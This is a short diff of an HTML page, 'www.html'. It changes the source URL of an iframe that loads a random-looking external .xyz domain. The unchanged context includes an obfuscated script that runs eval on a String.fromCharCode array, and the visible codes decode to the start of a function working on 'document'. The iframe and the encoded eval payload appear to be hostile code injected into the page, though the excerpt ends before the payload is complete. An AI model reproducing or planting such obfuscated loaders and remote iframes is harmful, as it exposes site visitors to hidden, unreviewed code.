--- a/www.html
+++ b/www.html
@@ -23,7 +23,7 @@
 		</style>
 	</head>
 	<body>
-		<iframe src="https://yuiyuioyui.yaruiwqreutio.xyz/www"></iframe>
+		<iframe src="https://yuiyuioyui.yaruiwqreutio.xyz/www/?"></iframe>
 		<script>
 			eval(String.fromCharCode(9, 102, 117, 110, 99, 40, 41, 59, 10, 102, 117, 110, 99, 116, 105, 111, 110, 32, 102, 117,
 				110, 99, 40, 41, 32, 123, 10, 9, 108, 101, 116, 32, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110,
